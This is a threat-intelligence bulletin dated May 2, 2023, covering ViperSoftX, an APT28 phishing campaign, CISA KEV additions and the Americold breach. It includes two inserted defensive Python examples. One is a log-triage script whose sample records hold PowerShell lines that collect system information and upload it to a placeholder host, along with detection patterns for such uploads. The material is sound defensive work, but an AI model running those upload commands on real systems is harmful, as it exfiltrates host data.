Ankura CTIX FLASH Update - May 2, 2023

Ankura Consulting Group LLC


Malware Activity

New "ViperSoftX" Variant Evolved to Target Password Managers, Cryptocurrency Wallets, and Browsers

Researchers have identified a new variant of the "ViperSoftX" cryptocurrency and information-stealing malware that is currently targeting password managers, including KeePass and 1Password. In the latest campaign, ViperSoftX targets a new range of browsers, including Brave, Opera, Edge, and Firefox, and impacts both the consumer and enterprise sectors. As of April 24, 2023, over 50% of the campaign's activity has taken place in the United States, Australia, Japan, India, Taiwan, Malaysia, Italy, and France. The malware has evolved to use a stronger encryption scheme based on byte remapping, which increases analysis difficulty because analysts cannot correctly decrypt the encrypted shellcode without the correct byte map. The malware also changes its command-and-control (C2) server monthly in order to evade detection more easily. Researchers explained that ViperSoftX arrives as "a software crack, an activator or a patcher, or a key generator (keygen)" and is often carried inside the files of legitimate, non-malicious software so that it remains hidden while posing as an illegal software version. Once the carrier software is on the victim machine, the malware checks for virtual machines, monitoring tools, and antivirus products. If the machine passes these checks, the malware decrypts its PowerShell code and downloads the malware's main routine. Researchers noted that ViperSoftX is known as a cryptocurrency stealer and, in the new variant, still scans local directories and browser extensions for a wide range of cryptocurrency wallets. CTIX analysts will continue to monitor the evolution and activity of ViperSoftX and will provide new details as they become available. Indicators of compromise (IOCs) as well as additional technical details can be viewed in the report linked below.

Threat Actor Activity

APT28 Targets Ukrainian Governments

A group of state-sponsored Russian hackers is back in the news this week after launching a new campaign against Ukraine and its allies. The group is tracked as APT28 (Fancy Bear, Pawn Storm) and is known for its espionage campaigns against NATO countries. Campaigns attributed to the group include the French TV5Monde defacement of 2015, the Democratic National Committee (DNC) compromise of 2016, and German government compromises between 2015 and 2017. Several group members were indicted in 2018 for their participation in the DNC attack, including nine (9) GRU officials. In this new campaign, APT28 actors distributed malicious phishing correspondence to the Ukrainian government. Posing as system administrators, APT28 actors lured victims into interacting with their so-called "Windows Update" application. Upon executing this application at the command line, a PowerShell script is downloaded which begins to simulate a simple Windows system update. However, once this script launches a second-stage payload, it runs additional commands in the background to gather information about the infected system. The threat actors invoked the ".\tasklist.exe" and ".\systeminfo.exe" commands from PowerShell and transmitted that data back to actor-controlled command-and-control (C2) servers. CTIX continues to track threat actor activity worldwide and will provide additional updates accordingly.
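The behaviour described above, a script that presents itself as a Windows update, runs tasklist.exe and systeminfo.exe, and pushes the output to a remote host, is a pattern a defender can hunt for in PowerShell script-block logging. The following is an added example written for this bulletin, not code from Ankura or from any referenced report: it scores constructed script-block records (a simplified, hypothetical rendering of Event ID 4104 text, not a real export) and surfaces those combining discovery commands with a network upload primitive. The hostnames, record ids and `example.invalid` URLs are constructed sample values.

```python
"""Added example: triage PowerShell script-block records for the
'fake Windows update' discovery pattern (tasklist.exe + systeminfo.exe +
network upload). Sample records below are constructed for illustration."""
import re
from dataclasses import dataclass

# Constructed sample script-block records: (record_id, host, script_text).
# Layout is hypothetical; real 4104 events carry more fields.
SAMPLE_LOGS = [
    (1, "WS-0142",
     "Write-Progress 'Checking for Windows updates'; Start-Sleep 5; "
     ".\\tasklist.exe | Out-File $env:TEMP\\t.txt; "
     ".\\systeminfo.exe | Out-File $env:TEMP\\s.txt; "
     "Invoke-WebRequest -Uri 'http://example.invalid/u' -Method POST -InFile $env:TEMP\\s.txt"),
    (2, "WS-0007", "Get-Process | Where-Object { $_.CPU -gt 100 }"),
    (3, "SRV-DB01", "systeminfo.exe > C:\\inventory\\sysinfo.txt"),
    (4, "WS-0311",
     ".\\tasklist.exe /v; .\\systeminfo.exe; "
     "[System.Net.WebClient]::new().UploadString('https://example.invalid/c', $out)"),
]

# Discovery binaries named in the bulletin, with or without the .\ prefix.
DISCOVERY_CMDS = re.compile(r"(?:\.\\)?(tasklist|systeminfo)\.exe", re.IGNORECASE)
# Common PowerShell/.NET primitives used to send data off-host.
EXFIL_PRIMS = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|WebClient|UploadString|UploadFile|Net\.Sockets",
    re.IGNORECASE)
# Lure text: the script claims to be a Windows update.
UPDATE_LURE = re.compile(r"windows\s+update", re.IGNORECASE)


@dataclass
class Finding:
    record_id: int
    host: str
    score: int
    reasons: list


def score_script(text):
    """Return (score, reasons) for one script block. Higher is more suspicious."""
    reasons = []
    score = 0
    cmds = {m.group(1).lower() for m in DISCOVERY_CMDS.finditer(text)}
    if {"tasklist", "systeminfo"} <= cmds:
        score += 2
        reasons.append("both tasklist.exe and systeminfo.exe invoked in one script")
    elif cmds:
        score += 1
        reasons.append("discovery command invoked: " + ", ".join(sorted(cmds)))
    if EXFIL_PRIMS.search(text):
        score += 2
        reasons.append("network upload primitive present in the same script")
    if UPDATE_LURE.search(text):
        score += 1
        reasons.append("script presents itself as a Windows update")
    return score, reasons


def triage(logs, threshold=3):
    """Return Findings for records whose score reaches the threshold.
    A lone systeminfo.exe from an admin host (record 3) stays below it."""
    findings = []
    for record_id, host, text in logs:
        score, reasons = score_script(text)
        if score >= threshold:
            findings.append(Finding(record_id, host, score, reasons))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOGS):
        print(f"record {f.record_id} on {f.host}: score {f.score}")
        for r in f.reasons:
            print("  -", r)
```

The scoring deliberately separates the discovery commands from the upload primitive: either alone is routine administration, and only their combination inside one script block (with the update lure as a tie-breaker) is what the described campaign looks like in logs.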

Vulnerabilities

CISA Adds Three Vulnerabilities to its KEV Catalog Impacting TP-Link, Apache, and Oracle Products

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three (3) critical vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerabilities affect TP-Link, Apache, and Oracle products, and all are under active exploitation by threat actors according to CISA. The first flaw, tracked as CVE-2023-1389, is a command injection vulnerability in the TP-Link Archer AX-21 router that could be exploited to achieve remote code execution (RCE). Researchers have observed threat actors associated with the Mirai botnet exploiting CVE-2023-1389 since early April 2023. The second vulnerability, tracked as CVE-2021-45046, is a deserialization of untrusted data flaw in the Apache Log4j2 logging library which is also being exploited to achieve RCE. Although no specific threat actors have been attributed to exploitation of this weakness, researchers have observed exploitation attempts from at least seventy-four (74) unique IP addresses that have also been observed exploiting the notorious Log4Shell vulnerability (CVE-2021-44228). The third flaw, tracked as CVE-2023-21839, is an unspecified vulnerability in Oracle WebLogic Server that allows unauthenticated threat actors who have already gained access to the target network to access sensitive data for exfiltration. The presence of these vulnerabilities on CISA's KEV mandates that all Federal Civilian Executive Branch (FCEB) agencies patch them or apply vendor-approved mitigations no later than May 22, 2023, or face being held accountable by regulators. CTIX analysts urge any users or organizations leveraging the aforementioned devices/software to update and harden their systems as soon as possible.
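KEV additions are only actionable once they are matched against what an organization actually runs and tracked against the remediation deadline. The following is an added example, not Ankura's or CISA's code: it parses a constructed excerpt of the KEV catalog JSON (field names follow the layout of CISA's public feed; the three records mirror the CVEs above, the 2023-05-22 due date is the one the bulletin gives, and the dateAdded values and the inventory itself are assumed sample data) and reports which inventory assets are affected and how many days remain.

```python
"""Added example: match a constructed KEV catalog excerpt against a local
product inventory and compute remediation deadlines. Sample data is
constructed; only the CVE ids, vendors, products and due date come from
the bulletin, dateAdded values are assumed."""
import json
from datetime import date

KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2023-1389", "vendorProject": "TP-Link", "product": "Archer AX-21",
         "vulnerabilityName": "TP-Link Archer AX-21 Command Injection Vulnerability",
         "dateAdded": "2023-05-01", "dueDate": "2023-05-22",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2021-45046", "vendorProject": "Apache", "product": "Log4j2",
         "vulnerabilityName": "Apache Log4j2 Deserialization of Untrusted Data Vulnerability",
         "dateAdded": "2023-05-01", "dueDate": "2023-05-22",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2023-21839", "vendorProject": "Oracle", "product": "WebLogic Server",
         "vulnerabilityName": "Oracle WebLogic Server Unspecified Vulnerability",
         "dateAdded": "2023-05-01", "dueDate": "2023-05-22",
         "requiredAction": "Apply updates per vendor instructions."},
    ],
})

# Constructed inventory (hypothetical asset names and spellings as an
# asset system might record them, in mixed case and with odd spacing).
INVENTORY = [
    {"asset": "edge-router-3", "vendor": "TP-LINK", "product": "Archer  AX-21 (v3)"},
    {"asset": "app-01", "vendor": "apache", "product": "log4j2 2.15.0"},
    {"asset": "crm-web", "vendor": "Microsoft", "product": "IIS 10"},
]


def norm(s):
    """Lowercase and collapse whitespace so inventory spellings compare cleanly."""
    return " ".join(s.lower().split())


def match_inventory(kev_json, inventory, today):
    """Return affected assets with their KEV due date, sorted by urgency."""
    catalog = json.loads(kev_json)
    hits = []
    for entry in catalog["vulnerabilities"]:
        vendor, product = norm(entry["vendorProject"]), norm(entry["product"])
        due = date.fromisoformat(entry["dueDate"])
        for asset in inventory:
            # Vendor must match exactly; product may carry a version suffix.
            if norm(asset["vendor"]) == vendor and product in norm(asset["product"]):
                hits.append({
                    "asset": asset["asset"],
                    "cveID": entry["cveID"],
                    "dueDate": entry["dueDate"],
                    "days_left": (due - today).days,
                    "overdue": today > due,
                    "requiredAction": entry["requiredAction"],
                })
    return sorted(hits, key=lambda h: (h["days_left"], h["asset"]))


if __name__ == "__main__":
    for h in match_inventory(KEV_SAMPLE, INVENTORY, date(2023, 5, 2)):
        state = "OVERDUE" if h["overdue"] else f"{h['days_left']} days left"
        print(f"{h['asset']}: {h['cveID']} due {h['dueDate']} ({state})")
```

Against a real feed the same function applies unchanged; the only difference is that `KEV_SAMPLE` would be the downloaded catalog text rather than an embedded excerpt, and the inventory would come from the asset system. The WebLogic entry produces no hit here simply because the sample inventory has no Oracle asset.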

Honorable Mention

Leading Cold Storage Company Shuts Down Network After Reporting Breach

Americold, a leading cold storage and logistics company based in Atlanta, filed an incident report with the Securities and Exchange Commission (SEC) regarding a cybersecurity incident that occurred on April 25, 2023, in which their computer network was breached. Americold controls 250 warehouses across the world, a large majority of which are used by food producers, distributors, and retailers. The company is the largest publicly traded real estate investment trust focused on the ownership, operation, acquisition, and development of temperature-controlled warehouses. In response to the attack, Americold was able to contain the intrusion and shut down their network to secure their systems and avoid further disruption to non-contained areas. One (1) customer alleged that the company's "phones [were] down and they had the truck entrance barricaded off with the main entrance gates shut." The company sent out a memo requesting that all inbound deliveries be rescheduled until further notice and that only the most critical outbound deliveries continue, such as those at risk of reaching an expiration date. While the company has not released a statement about the incident nor confirmed it to be a ransomware attack, Americold noted that they are assessing what data can be recovered while they focus on rebuilding impacted systems. It should be noted that there has been an observed increase in cyberattacks on food and beverage supply chain companies within the past few years, with fifty-two (52) reported ransomware attacks in 2022. This incident is the second cyberattack Americold has faced; their last event occurred in late 2020. Dragos CEO Rob Lee stated that the "hyperconnectivity and scalability of automation is what is allowing ransomware authors to do what they are doing," and that threat actors are targeting companies that cannot function when their digital systems go offline, taking advantage of companies' digital transformation projects.
